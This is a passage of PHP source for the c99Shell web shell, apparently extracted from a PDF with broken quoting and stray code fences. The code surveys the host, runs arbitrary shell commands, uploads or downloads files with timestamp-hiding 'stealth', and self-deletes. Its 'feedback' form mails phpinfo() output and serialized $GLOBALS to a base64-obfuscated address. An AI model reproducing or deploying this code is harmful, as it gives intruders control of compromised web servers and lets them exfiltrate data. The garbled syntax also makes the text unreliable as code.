else {
$windir = $_SERVER["WINDIR"];
$setcdir = $windir . "\system32\drivers\etc\\";
$v = array(
    array("Hosts",$setcdir."hosts"),
    array("Local Network Map",$setcdir."networks"),
    array("LM Hosts",$setcdir."lmhosts.sam"),
);
$sep = "\\";
}
foreach ($v as $sec_arr) {
    $sec_f = substr(strrchr($sec_arr[1], $sep), 1);
    $sec_d = rtrim($sec_arr[1],$sec_f);
    $sec_full = $sec_d.$sec_f;
    $sec_d = rtrim($sec_d,$sep);
    if (file_get_contents($sec_full)) {
        echo " [ <a href=\"\".$surl."act=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><u>
<b>".$sec_arr[0]."</b></u></a> ] ";
    }
}
echo "</td></tr>";

function displaysecinfo($name,$value) {
    if (!empty($value)) {
        echo "<tr><td>".$name."</td><td><pre>".wordwrap($value,100)."</pre></td></tr>";
    }
}

if (!$win) {
    displaysecinfo("OS Version",myshellexec("cat /proc/version"));
    displaysecinfo("Kernel Version",myshellexec("sysctl -a | grep version"));
    displaysecinfo("Distrib Name",myshellexec("cat /etc/issue.net"));
    displaysecinfo("Distrib Name (2)",myshellexec("cat /etc/*-realise"));
    displaysecinfo("CPU Info",myshellexec("cat /proc/cpuinfo"));
    displaysecinfo("RAM",myshellexec("free -m"));
    displaysecinfo("HDD Space",myshellexec("df -h"));
    displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
    displaysecinfo("Mount Options",myshellexec("cat /etc/fstab"));
}

```

```

displaysecinfo("cURL installed?",myshellexec("which curl"));
displaysecinfo("lynx installed?",myshellexec("which lynx"));
displaysecinfo("links installed?",myshellexec("which links"));
displaysecinfo("fetch installed?",myshellexec("which fetch"));
displaysecinfo("GET installed?",myshellexec("which GET"));
displaysecinfo("perl installed?",myshellexec("which perl"));
displaysecinfo("Where is Apache?",myshellexec("whereis apache"));
displaysecinfo("Where is perl?",myshellexec("whereis perl"));
displaysecinfo("Locate proftpd.conf",myshellexec("locate proftpd.conf"));
displaysecinfo("Locate httpd.conf",myshellexec("locate httpd.conf"));
displaysecinfo("Locate my.conf",myshellexec("locate my.conf"));
displaysecinfo("Locate psybnc.conf",myshellexec("locate psybnc.conf"));
}
else {
displaysecinfo("OS Version",myshellexec("ver"));
displaysecinfo("Account Settings",myshellexec("net accounts"));
}
echo "</table>\n";
}
if ($act == "mkfile") {
if ($mkfile != $d) {
if (file_exists($mkfile)) {echo "<b>Make File \".htmlspecialchars($mkfile).\"</b>: object
already exists!";}
elseif (!fopen($mkfile,"w")) {echo "<b>Make File \".htmlspecialchars($mkfile).\"</b>: access
denied!";}
else {$sact = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .=
DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
}
else {$sact = $dspact = "ls";}
}
if ($act == "encoder") {
echo "<script language=\"javascript\">function set_encoder_input(text)
{document.forms.encoder.input.value = text;}</script>".
"<form name=\"encoder\" action=\"\".$surl.\"\" method=POST>".
"<input type=hidden name=act value=encoder>".
"<center><table>".
"<tr><td colspan=4>.: Encoder :.</td>".
"<tr><td colspan=2>Input:</td><td><textarea name=\"encoder_input\" id=\"input\" cols=70
rows=5>\".@htmlspecialchars($encoder_input).\"</textarea><br>".

```

```

"<input type=submit value=\"calculate\"></td></tr>".
"<tr><td rowspan=4>Hashes:</td>";
foreach(array("md5","crypt","sha1","crc32") as $v) {
    echo "<td>.$v.":</td><td><input type=text size=50 onFocus=\"this.select()\"
onmouseover=\"this.select()\" onmouseout=\"this.select()\" value=\"\". $v($encoder_input).\"\"
readonly></td></tr><tr>";
}
echo "</tr>".
"<tr><td rowspan=2>Url:</td>".
"<td>urlencode:</td><td><input type=text size=35 onFocus=\"this.select()\"
onmouseover=\"this.select()\" onmouseout=\"this.select()\"
value=\"\".urlencode($encoder_input).\"\" readonly></td></tr>".
"<tr><td>urldecode:</td><td><input type=text size=35 onFocus=\"this.select()\"
onmouseover=\"this.select()\" onmouseout=\"this.select()\"
value=\"\".htmlspecialchars(urldecode($encoder_input)).\"\" readonly></td></tr>".
"<tr><td rowspan=2>Base64:</td>".
"<td>base64_encode:</td><td><input type=text size=35 onFocus=\"this.select()\"
onmouseover=\"this.select()\" onmouseout=\"this.select()\"
value=\"\".base64_encode($encoder_input).\"\" readonly></td></tr>".
"<tr><td>base64_decode:</td><td>";
if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input
type=text size=35 value=\"Failed!\" disabled readonly>";}
else {
    $debase64 = base64_decode($encoder_input);
    $debase64 = str_replace("\0","[0]",$debase64);
    $a = explode("\r\n",$debase64);
    $rows = count($a);
    $debase64 = htmlspecialchars($debase64);
    if ($rows == 1) { echo "<input type=text size=35 onFocus=\"this.select()\"
onmouseover=\"this.select()\" onmouseout=\"this.select()\" value=\"\".$debase64.\"\"
id=\"debase64\" readonly>"; }
    else { $rows++; echo "<textarea cols=\"40\" rows=\"\".$rows.\"\" onFocus=\"this.select()\"
onmouseover=\"this.select()\" onmouseout=\"this.select()\" id=\"debase64\"
readonly>.$debase64.</textarea>"; }
    echo "&nbsp;<a href=\"#\"
onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]
</a>";
}
echo "</td></tr>".

```

```

" <tr><td>Base convertations:</td><td>dec2hex</td><td><input type=text size=35
onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"\";
$c = strlen($encoder_input);
for($i=0;$i<$c;$i++) {
    $hex = dechex(ord($encoder_input[$i]));
    if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
    elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
}
echo "\" readonly></td></tr></table></center></form>";
}
if ($sact == "fsbuff") {
    $arr_copy = $sess_data["copy"];
    $arr_cut = $sess_data["cut"];
    $arr = array_merge($arr_copy,$arr_cut);
    if (count($arr) == 0) {echo "<h2><center>Buffer is empty!</center></h2>";}
    else {
        $yx_infohead = "File-System Buffer";
        $ls_arr = $arr;
        $disp_fullpath = TRUE;
        $sact = "ls";
    }
}
if ($sact == "selfremove") {
    if (($submit == $rndcode) and ($submit != "")) {
        if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ".$sh_name.""; c99shexit(); }
        else {echo "<center><b>Can't delete '.__FILE__.'</b></center>";}
    }
    else {
        if (!empty($rndcode)) {echo "<b>Error: incorrect confirmation!</b>";}
        $rnd = rand(0,9).rand(0,9).rand(0,9);
        echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-
remove: '.__FILE__.' <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"
</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text
name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
    }
}
if ($sact == "update") { //Update c99Shell
    $ret = c99sh_getupdate(!$confirmupdate);
    echo "<b>".$ret."</b>";
}

```

```

if (strstr($ret,"new version")) {
    echo "<br><br><input type=button
onclick=\"location.href=\".$surl.\"act=update&confirmupdate=1';\" value=\"Update now\">";
}
}
if ($act == "feedback") {
    $suppmail = base64_decode("YXN5aWVrMTJAZ21haWwuY29t");
    if (!empty($submit)){
        $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
        $body = $sh_name." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-
mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP:
".$REMOTE_ADDR;
        if (!empty($fdbk_ref)) {
            $tmp = @ob_get_contents();
            ob_clean();
            phpinfo();
            $phpinfo = base64_encode(ob_get_contents());
            ob_clean();
            echo $tmp;
            $body .= "\n".phpinfo():
".$phpinfo."\n".'$GLOBALS="'.base64_encode(serialize($GLOBALS))."\n";
        }
        mail($suppmail,$sh_name." feedback #".$ticket,$body,"FROM: ".$suppmail);
        echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket."</b></center>";
    }
    else {
        echo "<form action=\"\".$surl.\"\" method=POST>".
            "<input type=hidden name=act value=feedback>".
            "<table><tr><td colspan=2>".
            ".: Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail).") :.
</td></tr>".
            "<tr><td>Your name:</td><td><input type=\"text\" name=\"fdbk_name\"
value=\"\".htmlspecialchars($fdbk_name).\"\"></td></tr>".
            "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"fdbk_email\"
value=\"\".htmlspecialchars($fdbk_email).\"\"></td></tr>".
            "<tr><td>Message:</td><td><textarea name=\"fdbk_body\" cols=80
rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\"
name=\"fdbk_ref\" value=\"\".urlencode($HTTP_REFERER).\"\"><br>".
            "<input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked> Attach Server info

```

(Recommended for bug-fix)
".

```
    "*Language: English, Indonesian.</td></tr>".
```

```
    "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
```

```
    "</table>";
```

```
    }
```

```
  }
```

```
if ($act == "yxmailer") {
```

```
  if (!empty($submit)){
```

```
    $headers = 'To: '.$dest_email."\r\n";
```

```
    $headers .= 'From: '.$sender_name.' '.$sender_email."\r\n";
```

```
    if (mail($suppmail,$sender_subj,$sender_body,$header)) {
```

```
      echo "<center><b>Email sent!</b></center>";
```

```
    }
```

```
    else { echo "<center><b>Couldn't send email!</b></center>"; }
```

```
  }
```

```
else {
```

```
  echo "<form action=\"".$surl."\" method=POST>".
```

```
    "<input type=hidden name=act value=yxmailer>".
```

```
    "<table><tr><td colspan=2>".
```

```
      ".: $sh_name Mailer .:</td></tr>".
```

```
      "<tr><td>Your name:</td><td><input type=\"text\" name=\"sender_name\"
```

```
value=\"".$htmlspecialchars($sender_name)."\"></td></tr>".
```

```
      "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"sender_email\"
```

```
value=\"".$htmlspecialchars($sender_email)."\"></td></tr>".
```

```
      "<tr><td>To:</td><td><input type=\"text\" name=\"dest_email\"
```

```
value=\"".$htmlspecialchars($dest_email)."\"></td></tr>".
```

```
      "<tr><td>Subject:</td><td><input size=70 type=\"text\" name=\"sender_subj\"
```

```
value=\"".$htmlspecialchars($sender_subj)."\"></td></tr>".
```

```
      "<tr><td>Message:</td><td><textarea name=\"sender_body\" cols=80
```

```
rows=10>".$htmlspecialchars($sender_body)."</textarea><br>".
```

```
      "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
```

```
    "</table>";
```

```
    "</table>";
```

```
  }
```

```
}
```

```
if ($act == "search") {
```

```
  echo "<div>.: $sh_name File-System Search .:</div>";
```

```
  if (empty($search_in)) {$search_in = $d;}
```

```

if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
if (empty($search_text_wwo)) {$search_text_regexp = 0;}
if (!empty($submit)) {
    $found = array();
    $found_d = 0;
    $found_f = 0;
    $search_i_f = 0;
    $search_i_d = 0;
    $a = array(
        "name"=>$search_name,
        "name_regexp"=>$search_name_regexp,
        "text"=>$search_text,
        "text_regexp"=>$search_text_regexp,
        "text_wwo"=>$search_text_wwo,
        "text_cs"=>$search_text_cs,
        "text_not"=>$search_text_not
    );
    $searchtime = getmicrotime();
    $in = array_unique(explode(";", $search_in));
    foreach($in as $v) {c99fsearch($v);}
    $searchtime = round(getmicrotime()-$searchtime,4);
    if (count($found) == 0) {echo "No files found!";}
    else {
        $ls_arr = $found;
        $disp_fullpath = TRUE;
        $act = "ls";
    }
}
echo "<table>".
    "<tr><td><form method=POST>".
        "<input type=hidden name=\"d\" value=\"\". $dispd.\"><input type=hidden name=act
value=\"\". $dspact.\">".
        "File or folder Name:</td><td><input type=\"text\" name=\"search_name\"
size=\"\".round(strlen($search_name)+25).\"\"
value=\"\".htmlspecialchars($search_name).\"\">&nbsp;<input type=\"checkbox\"
name=\"search_name_regexp\" value=\"1\" \".( $search_name_regexp == 1? \"checked\":\"\").\"> -
Regular Expression</td></tr>".
        "<tr><td>Look in (Separate by \";\");</td><td><input type=\"text\" name=\"search_in\"
size=\"\".round(strlen($search_in)+25).\"\" value=\"\".htmlspecialchars($search_in).\"\"></td>

```

```
</tr>".
```

```
"<tr><td>A word or phrase in the file:</td><td><textarea name=\"search_text\" cols=\"50\" rows=\"5\">".htmlspecialchars($search_text)."</textarea></td></tr>".
```

```
"<tr><td></td><td><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ". ($search_text_regexp == 1?" checked":"")."> Regular Expression".
```

```
" <input type=\"checkbox\" name=\"search_text_wwol\" value=\"1\" ".($search_text_wwol == 1?" checked":"")."> Whole words only".
```

```
" <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> Case sensitive".
```

```
" <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> Find files NOT containing the text</td></tr>".
```

```
"<tr><td></td><td><input type=submit name=submit value=\"Search\"></form></td></tr>".
```

```
"</table>";
```

```
if ($act == "ls") {
```

```
  $dspact = $act;
```

```
  echo "Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b>".
```

```
  "<hr size=\"1\" noshade>";
```

```
}
```

```
}
```

```
if ($act == "chmod") {
```

```
  $mode = fileperms($d.$f);
```

```
  if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} 
```

```
  else {
```

```
    $form = TRUE;
```

```
    if ($chmod_submit)
```

```
    {
```

```
      $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
```

```
      if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} 
```

```
      else {$err = "Can't chmod to ".$octet.".";} 
```

```
    }
```

```
  if ($form)
```

```
  {
```

```
    $perms = parse_perms($mode);
```

```
    echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." 
```

```
(".$substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."</form
```

```

action="\${url}" method=POST><input type=hidden name=d
value="\${htmlspecialchars($d)}"><input type=hidden name=f
value="\${htmlspecialchars($f)}"><input type=hidden name=act value=chmod><table
align=left width=300 border=0 cellpadding=5><tr><td><b>Owner</b><br><br>
<input type=checkbox NAME=chmod_o[r] value=1" .($perms["o"]["r"]?"
checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1" .
($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x]
value=1" .($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input
type=checkbox NAME=chmod_g[r] value=1" .($perms["g"]["r"]?"
checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1" .
($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x]
value=1" .($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br>
<input type=checkbox NAME=chmod_w[r] value=1" .($perms["w"]["r"]?"
checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1" .
($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x]
value=1" .($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input
type=submit name=chmod_submit value="Save"></td></tr></table></form>;
}
}
}
if ($act == "upload") {
    $uploadmess = "";
    $uploadpath = str_replace("\\", DIRECTORY_SEPARATOR, $uploadpath);
    if (empty($uploadpath)) {$uploadpath = $d;}
    elseif (substr($uploadpath, -1) != DIRECTORY_SEPARATOR) {$uploadpath .=
DIRECTORY_SEPARATOR;}
    if (!empty($submit)) {
        global $_FILES;
        $uploadfile = $_FILES["uploadfile"];
        if (!empty($uploadfile["tmp_name"])) {
            if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
            else {$destin = $userfilename;}
            if (!move_uploaded_file($uploadfile["tmp_name"], $uploadpath.$destin)) {
                $uploadmess .= "Error uploading file ". $uploadfile["name"]. " (can't copy
\${uploadfile["tmp_name"]} to \${uploadpath.$destin}."<br>;
            }
            else { $uploadmess .= "File uploaded successfully!<br>". $uploadpath.$destin; }
        }
    }
    elseif (!empty($uploadurl)) {

```

```

if (!empty($uploadfilename)) {$destin = $uploadfilename;}
else {
    $destin = explode("/", $destin);
    $destin = $destin[count($destin)-1];
    if (empty($destin)) {
        $i = 0;
        $b = "";
        while(file_exists($uploadpath.$destin)) {
            if ($i > 0) {$b = "_" . $i;}
            $destin = "upload" . $b;
            $i++;
        }
    }
}
if ((!ereg("http://", $uploadurl)) and (!ereg("https://", $uploadurl)) and
(!ereg("ftp://", $uploadurl))) {echo "<b>Incorrect URL!</b>";}
else {
    $st = getmicrotime();
    $content = @file_get_contents($uploadurl);
    $dt = round(getmicrotime()-$st,4);
    if (!$content) {$uploadmess .= "Can't download file!";}
    else {
        if ($filestealth) {$stat = stat($uploadpath.$destin);}
        $fp = fopen($uploadpath.$destin, "w");
        if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."<br>";}
        else {
            fwrite($fp, $content, strlen($content));
            fclose($fp);
            if ($filestealth) {touch($uploadpath.$destin, $stat[9], $stat[8]);}
            $uploadmess .= "File saved from ".$uploadurl." !";
        }
    }
}
else { echo "No file to upload!"; }
}
if ($miniform) {
    echo "<b>".$uploadmess."</b>";
    $act = "ls";
}

```

```

}
else {
    echo "<table><tr><td colspan=2>".
        ".: File Upload :.</td>".
        "<td colspan=2>".$uploadmess."</td></tr>".
        "<tr><td><form enctype=\"multipart/form-data\"
action=\"\".$surl."act=upload&d=".urlencode($d)."\" method=POST>".
        "From Your Computer:</td><td><input name=\"uploadfile\" type=\"file\"></td></tr>".
        "<tr><td>From URL:</td><td><input name=\"uploadurl\" type=\"text\"
value=\"\".htmlspecialchars($uploadurl)."\" size=\"70\"></td></tr>".
        "<tr><td>Target Directory:</td><td><input name=\"uploadpath\" size=\"70\"
value=\"\".$dispd)."\"></td></tr>".
        "<tr><td>Target File Name:</td><td><input name=uploadfilename size=25></td></tr>".
        "<tr><td></td><td><input type=checkbox name=uploadautoname value=1 id=df4>
Convert file name to lowercase</td></tr>".
        "<tr><td></td><td><input type=submit name=submit value=\"Upload\">".
        "</form></td></tr></table>";
}
}
if ($act == "delete") {
    $delerr = "";
    foreach ($sactbox as $v) {
        $result = FALSE;
        $result = fs_rmobj($v);
        if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
    }
    if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
    $act = "ls";
}
if (!$usefsbuff) {
    if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
<center><b>Sorry, buffer is disabled. For enable, set directive \"\$usefsbuff\" as TRUE.
</center>";}
}
else {
    if ($act == "copy") {$serr = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$sactbox);
c99_sess_put($sess_data); $act = "ls"; }
    elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$sactbox);
c99_sess_put($sess_data); $act = "ls";}
}
}

```

```

elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox))
{unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if
(in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array();
c99_sess_put($sess_data);}
elseif ($actpastebuff) {
    $psterr = "";
    foreach($sess_data["copy"] as $k=>$v) {
        $to = $d.basename($v);
        if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."<br>";}
        if ($copy_unset) {unset($sess_data["copy"][$k]);}
    }
    foreach($sess_data["cut"] as $k=>$v) {
        $to = $d.basename($v);
        if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."<br>";}
        unset($sess_data["cut"][$k]);
    }
    c99_sess_put($sess_data);
    if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
    $act = "ls";
}
elseif ($actarcbuff) {
    $arcerr = "";
    if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
    else {$ext = ".tar.gz";}
    if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
    $cmdline .= " ".$actarcbuff_path;
    $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
    foreach($objects as $v) {
        $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
        if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
        if (is_dir($v)) {
            if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
            $v .= "*";
        }
        $cmdline .= " ".$v;
    }
    $tmp = realpath(".");
    chdir($d);
}

```

```

$ret = myshellexec($cmdline);
chdir($tmp);
if (empty($ret)) {$arcerr .= "Can't call archivor
(".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
$ret = str_replace("\r\n","\n",$ret);
$ret = explode("\n",$ret);
if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
foreach($sess_data["cut"] as $k=>$v) {
    if (in_array($v,$ret)) {fs_rmobj($v);}
    unset($sess_data["cut"][$k]);
}
c99_sess_put($sess_data);
if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
$sact = "ls";
}
elseif ($sactpastebuff) {
    $psterr = "";
    foreach($sess_data["copy"] as $k=>$v) {
        $to = $d.basename($v);
        if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."<br>";}
        if ($copy_unset) {unset($sess_data["copy"][$k]);}
    }
    foreach($sess_data["cut"] as $k=>$v) {
        $to = $d.basename($v);
        if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."<br>";}
        unset($sess_data["cut"][$k]);
    }
    c99_sess_put($sess_data);
    if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
    $sact = "ls";
}
}
if ($sact == "cmd") {
    @chdir($chdir);
    if (!empty($submit)) {
        echo "<div>.: Result of Command Execution :.</div>";
        $olddir = realpath(".");
        @chdir($d);
        $ret = myshellexec($cmd);
    }
}

```

```

$ret = convert_cyr_string($ret,"d","w");
if ($cmd_txt) {
    $rows = count(explode("\r\n",$ret))+1;
    if ($rows < 10) {$rows = 10; }
    if ($msie) { $cols = 113; }
    else { $cols = 117;}
    //echo "<textarea cols=\"\$cols\" rows=\"\$rows\" readonly>".htmlspecialchars($ret)."
</textarea>";
    echo "<div align=left><pre>".htmlspecialchars($ret)."</pre></div>";
}
else {echo $ret."<br>";}
@chdir($olddir);
}
else {
    echo "<b>Command Execution</b>";
    if (empty($cmd_txt)) {$cmd_txt = TRUE;}
}
}
if ($act == "ls") {
    if (count($ls_arr) > 0) { $list = $ls_arr; }
    else {
        $list = array();
        if ($h = @opendir($d)) {
            while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
            closedir($h);
        }
    }
}
if (count($list) == 0) { echo "<div>Can't open folder (".htmlspecialchars($d).")!</div>";}
else {
    $objects = array();
    $vd = "f"; //Viewing mode
    if ($vd == "f") {
        $objects["head"] = array();
        $objects["folders"] = array();
        $objects["links"] = array();
        $objects["files"] = array();
        foreach ($list as $v) {
            $o = basename($v);
            $row = array();

```

```

if ($o == ".") {$row[] = $d.$o; $row[] = "CURDIR";}
elseif ($o == "..") {$row[] = $d.$o; $row[] = "UPDIR";}
elseif (is_dir($v)) {
    if (is_link($v)) {$type = "LINK";}
    else {$type = "DIR";}
    $row[] = $v;
    $row[] = $type;
}
elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
$row[] = filemtime($v);
if (!$win) {
    $ow = posix_getpwuid(fileowner($v));
    $gr = posix_getgrgid(filegroup($v));
    $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
}
$row[] = fileperms($v);
if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
elseif (is_link($v)) {$objects["links"][] = $row;}
elseif (is_dir($v)) {$objects["folders"][] = $row;}
elseif (is_file($v)) {$objects["files"][] = $row;}
$i++;
}
$row = array();
$row[] = "<b>Name</b>";
$row[] = "<b>Size</b>";
$row[] = "<b>Date Modified</b>";
if (!$win) {$row[] = "<b>Owner/Group</b>";}
$row[] = "<b>Perms</b>";
$row[] = "<b>Action</b>";
$parsesort = parsesort($sort);
$sort = $parsesort[0].$parsesort[1];
$k = $parsesort[0];
if ($parsesort[1] != "a") {$parsesort[1] = "d";}
$y = " <a href=\"\".$surl."act=\".$dspact."&d=\".urlencode($d)."&sort=\".$k.($parsesort[1] ==
"a"?"d":"a").\">";
$y .= "<img src=\"\".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc").\" height=\"9\"
width=\"14\" alt=\"\".($parsesort[1] == "a"?"Asc":"Desc").\" border=\"0\"></a>";
$row[$k] .= $y;

```

```

for($i=0;$i<count($row)-1;$i++) {
    if ($i != $k) {$row[$i] = "<a
href=\"".$$url."act=".$$dspact."&d=" .urlencode($d)."&sort=".$i.$$parsesort[1].\">".$row[$i]."
</a>";}
}
$v = $parsesort[0];
usort($objects["folders"], "tabsort");
usort($objects["links"], "tabsort");
usort($objects["files"], "tabsort");
if ($parsesort[1] == "d") {
    $objects["folders"] = array_reverse($objects["folders"]);
    $objects["files"] = array_reverse($objects["files"]);
}
$objects =
array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
$tab = array();
$tab["cols"] = array($row);
$tab["head"] = array();
$tab["folders"] = array();
$tab["links"] = array();
$tab["files"] = array();
$i = 0;
foreach ($objects as $a) {
    $v = $a[0];
    $o = basename($v);
    $dir = dirname($v);
    if ($disp_fullpath) {$disppath = $v;}
    else {$disppath = $o;}
    $disppath = str2mini($disppath,60);
    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
    foreach ($regxp_highlight as $r) {
        if (ereg($r[0],$o) {
            if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning!
Configuration error in \$regxp_highlight[\".$k.\""][0] - unknown command."; c99shexit();}
            else {
                $r[1] = round($r[1]);
                $isdir = is_dir($v);
                if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {

```

```

        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
        $disppath = $r[2].$disppath.$r[3];
        if ($r[4]) {break;}
    }
}
}
}
$uo = urlencode($o);
$ud = urlencode($dir);
$uv = urlencode($v);
$row = array();
if ($o == ".") {
    $row[] = "<a
href=\"\".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img
src=\"\".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;".$o."</a>";
    $row[] = "CURDIR";
}
elseif ($o == "..") {
    $row[] = "<a
href=\"\".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img
src=\"\".$surl."act=img&img=ext_inl\" border=\"0\">&nbsp;".$o."</a>";
    $row[] = "UPDIR";
}
elseif (is_dir($v)) {
    if (is_link($v)) {
        $disppath .= " => ".readlink($v);
        $type = "LINK";
        $row[] = "<a href=\"\".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img
src=\"\".$surl."act=img&img=ext_inl\" border=\"0\">&nbsp;[".$disppath."]</a>";
    }
    else {
        $type = "DIR";
        $row[] = "<a href=\"\".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img
src=\"\".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;[".$disppath."]</a>";
    }
    $row[] = $type;
}
elseif(is_file($v)) {
    $ext = explode(".", $o);

```

```

$c = count($ext)-1;
$ext = $ext[$c];
$ext = strtolower($ext);
$row[] = "<a href=\"\". $surl."act=f&f=".$uo."&d=".$ud."\"><img
src=\"\". $surl."act=img&img=ext_". $ext."\" border=\"0\">&nbsp;". $disppath."</a>";
$row[] = view_size($a[1]);
}
$row[] = date("d.m.Y H:i:s", $a[2]);
if (!$win) {$row[] = $a[3];}
$row[] = "<a href=\"\". $surl."act=chmod&f=".$uo."&d=".$ud."\">
<b>".view_perms_color($v)."</b></a>";
if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\"
onclick=\"ls_reverse_all();\">"; $i--;}
else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox\".$i.\"\"
value=\"\".htmlspecialchars($v)."\">";}
if (is_dir($v)) {$row[] = "<a href=\"\". $surl."act=d&d=".$uv."\"><img
src=\"\". $surl."act=img&img=ext_diz\" alt=\"Info\" border=\"0\"></a>&nbsp;". $checkbox;}
else {$row[] = "<a href=\"\". $surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img
src=\"\". $surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\">
</a>&nbsp;"; <a href=\"\". $surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img
src=\"\". $surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\">
</a>&nbsp;"; <a href=\"\". $surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img
